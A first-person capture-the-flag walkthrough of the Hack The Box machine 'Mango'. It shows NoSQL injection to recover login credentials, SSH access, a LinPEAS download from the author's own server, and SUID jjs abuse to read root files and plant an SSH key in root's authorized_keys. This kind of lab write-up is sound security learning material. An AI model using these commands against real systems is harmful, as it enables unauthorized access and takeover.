When life gives you mangos. This box has little to do with real mangos, but differs only 1 letter from a well-known NoSQL platform. And here is the initial access to this box. An interesting Medium box that raised my score by 30 points and from Hacker to Pro Hacker on Hack The Box..
[0x1] Reconnaissance & Enumeration
A new box, a new scan. It sounds boring, but every box starts with a good scan. This gives a good idea of where your starting point can be at the beginning of the journey.
nmap -sC -sV -T5 -p- -oA ~/Documents/boxes/mango/magno-allports Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-27 11:37 GMT Nmap scan report for staging-order.mango.htb ( Host is up (0.033s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 a8:8f:d9:6f:a6:e4:ee:56:e3:ef:54:54:6d:56:0c:f5 (RSA) | 256 6a:1c:ba:89:1e:b0:57:2f:fe:63:e1:61:72:89:b4:cf (ECDSA) |_ 256 90:70:fb:6f:38:ae:dc:3b:0b:31:68:64:b0:4e:7d:c9 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Mango | Sweet & Juicy 443/tcp open ssl/http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Mango | Search Base | ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN | Not valid before: 2019-09-27T14:21:19 |_Not valid after: 2020-09-26T14:21:19 |_ssl-date: TLS randomness does not represent time | tls-alpn: |_ http/1.1 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
You will not see a website on port 80 based on IP-address or hostname mango.htb. Then again at 443 it does. The first thing that appears is a message that the certificate is incorrect.
Tip: if you receive a certificate notification, be sure to check the certificate. Even if you expect it to be incorrect, it is often worth it. Mango’s certificate contains an interesting hostname: staging-order.mango.htb.
Before I go to view the hostname on the certificate, I first have to sift through the standard website. However, there is not immediately anything interesting to find here. It’s a search engine similar to Google, but your XSS and other tricks won’t deliver. The analytics link provides access to all kinds of data, but may be further archived under the rabbitholes.
Then try that hostname of the certificate. That looksa lot better.
[0x2] Initial foothold
Here too all kinds of ways to abuse the login form started. SQL injection didn’t work, but when trying NoSQL injection I got surprising result. A page that is Under Plantation . So there is a possibility for NoSQL injection.
Coincidentally, I recently saved a url for a handy tool that can do NoSQL injection and is suitable for MongoDB (hey, that sound like Mango;)).
git clone https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration.git Cloning into 'Nosql-MongoDB-injection-username-password-enumeration'... remote: Enumerating objects: 56, done. remote: Counting objects: 100% (56/56), done. remote: Compressing objects: 100% (56/56), done. remote: Total 56 (delta 15), reused 0 (delta 0), pack-reused 0 Unpacking objects: 100% (56/56), done.
The Python script provides you with a number of parameters, such as; the url, the names of the fields, the field to be tested and the login button. He starts a pattern and completes letter by letter. Of course I removed some superfluous output to avoid that there is a very long list.
python nosqli-user-pass-enum.py -u http://staging-order.mango.htb -up username -pp password -op login:login -ep username -m POST No pattern starts with '0' No pattern starts with '1' No pattern starts with '2' No pattern starts with '3' No pattern starts with '4' No pattern starts with '5' No pattern starts with '6' No pattern starts with '7' No pattern starts with '8' No pattern starts with '9' Pattern found that starts with 'a' Pattern found: ad Pattern found: adm Pattern found: admi Pattern found: admin username found: admin Pattern found that starts with 'm' Pattern found: ma Pattern found: man Pattern found: mang Pattern found: mango username found: mango No pattern starts with 'n' No pattern starts with 'o' No pattern starts with 'p' 2 username(s) found: admin mango
Two usernames in the pocket. Now I do the same again, but for the passwords.
python nosqli-user-pass-enum.py -u http://staging-order.mango.htb -up username -pp password -op login:login -ep password -m POST No pattern starts with 'a' No pattern starts with 'b' No pattern starts with 'c' No pattern starts with 'd' No pattern starts with 'e' No pattern starts with 'f' No pattern starts with 'g' Pattern found that starts with 'h' Pattern found: h3 Pattern found: h3m Pattern found: h3mX Pattern found: h3mXK Pattern found: h3mXK8 Pattern found: h3mXK8R Pattern found: h3mXK8Rh Pattern found: h3mXK8RhU Pattern found: h3mXK8RhU~ Pattern found: h3mXK8RhU~f Pattern found: h3mXK8RhU~f{ Pattern found: h3mXK8RhU~f{] Pattern found: h3mXK8RhU~f{]f Pattern found: h3mXK8RhU~f{]f5 Pattern found: h3mXK8RhU~f{]f5H password found: h3mXK8RhU~f{]f5H No pattern starts with 'i' No pattern starts with 'q' No pattern starts with 'r' No pattern starts with 's' Pattern found that starts with 't' Pattern found: t9 Pattern found: t9K Pattern found: t9Kc Pattern found: t9KcS Pattern found: t9KcS3 Pattern found: t9KcS3> Pattern found: t9KcS3>! Pattern found: t9KcS3>!0 Pattern found: t9KcS3>!0B Pattern found: t9KcS3>!0B# Pattern found: t9KcS3>!0B#2 password found: t9KcS3>!0B#2 No pattern starts with 'u' No pattern starts with 'v' No pattern starts with 'w' No pattern starts with 'x' No pattern starts with 'y' No pattern starts with 'z' 2 password(s) found: h3mXK8RhU~f{]f5H t9KcS3>!0B#2
Two hits here too. Now all you have to do is try which user matches which password, but then you will notice quickly enough when you log in.
- Username: admin / Password: t9KcS3>!0B#2
- Username: mango / Password: h3mXK8RhU~f{]f5H
First I try to log in with the user: admin , but this is without result. The port is open according to the Nmap scan, but apparently the user is not allowed to connect.
ssh admin@ admin@'s password: Permission denied, please try again.
Then we continue with the user; mango . This time I get access via SSH and I am logged in.
sudo ssh mango@ The authenticity of host ' (' can't be established. ECDSA key fingerprint is SHA256:AhHG3k5r1ic/7nEKLWHXoNm0m28uM9W8heddb9lCTm0. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '' (ECDSA) to the list of known hosts. mango@'s password: Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-64-generic x86_64)
[0x3] Path to User flag
There is nothing interesting in the home directory of mango, just some scripts from other HTB-ers. I browse to admin’s folder and here I find the user-flag. Unfortunately, no rights to view the content. From the session of mango I try via sudo to change the account to admin. This is fine and I have gone a step further and can use a full shell.
mango@mango:~$ su admin Password: $ whoami admin bash
[0x4] Path to Root flag
Via SimpleHTTPServer I start a web server on my own machine and download LinPeas (Linux Privilege Escalation Awesome Script) for further enumeration.
wget --2020-02-26 09:57:54-- Connecting to connected. HTTP request sent, awaiting response... 200 OK Length: 144338 (141K) [text/x-sh] Saving to: ‘linpeas.sh’ linpeas.sh 100%[================================================================>] 140.96K 159KB/s in 0.9s 2020-02-26 09:57:55 (159 KB/s) - ‘linpeas.sh’ saved [144338/144338]
The script gives a lot of output and checks the machine for the presence of cron jobs, places where I have too many rights, vulnerable processes and so on. Twice run into / usr / lib / jvm / java-11-openjdk-amd64 / bin / jjs . Both as an interesting file and a place where admin has rights to execute where only root should have it. JJS is a command line tool used to execute commands to the so-called Nashhorn engine.
admin@mango:/tmp$ bash linpeas.sh linpeas v2.3.4 by carlospolop ====================================( Interesting Files )===================================== [+] SUID - Check easy privesc, exploits and write perms [i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#commands-with-sudo-and-suid-commands /bin/fusermount /bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8 /bin/umount ---> BSD/Linux(08-1996) /bin/su /bin/ping /snap/core/7713/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8 /snap/core/7713/bin/ping /snap/core/7713/bin/ping6 /snap/core/7713/bin/su /snap/core/7713/bin/umount ---> BSD/Linux(08-1996) /snap/core/7713/usr/bin/chfn ---> SuSE_9.3/10 .. .. .. /usr/bin/pkexec ---> Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485) /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic /usr/lib/policykit-1/polkit-agent-helper-1 /usr/lib/eject/dmcrypt-get-device /usr/lib/jvm/java-11-openjdk-amd64/bin/jjs /usr/lib/openssh/ssh-keysign /usr/lib/snapd/snap-confine
On GTFOBIns I come across jjs with some well known private edge escalations. One for a shell, and one for reading files. To test if it works I try to read the output of /root/root.txt from jjs
The breakout succeeds and I now have rights to read root.txt. Fine to get the points, but yeah… .. it’s not a shell yet.
echo 'var BufferedReader = Java.type("java.io.BufferedReader"); var FileReader = Java.type("java.io.FileReader"); var br = new BufferedReader(new FileReader("/root/root.txt")); while ((line = br.readLine()) != null) { print(line); }' | jjs 8a8ef79a7a2fbb01ea81688424e9ab15
A second method is to write data. In this case I take the content of my public key on my Parrot VM and write it to the authorized keys of the root user on Mango. With this I should be able to log in based on my private key without a password. Provided that root is allowed to connect via SSH, of course.
/usr/lib/jvm/java-11-openjdk-amd64/bin/jjs -scripting $EXEC("echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABg[[........]]h87orudH7MJ2bFhALQ0=' > /root/.ssh/authorized_keys");
Successful! connecting as root using the authorized key was successful. And besides the root flag, I now also have a full shell on the machine. Who am I? Root!
ssh -i /root/.ssh/id_rsa mango Enter passphrase for key '/root/.ssh/id_rsa': Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-64-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Wed Feb 26 09:46:26 UTC 2020
Last login: Thu Oct 10 08:33:27 2019 root@mango:~# hostname mango root@mango:~# whoami root root@mango:~# ls -l total 4 -r-------- 1 root root 33 Sep 27 14:32 root.txt cat root.txt 8a8ef79a7a2fbb01ea81688424e9ab15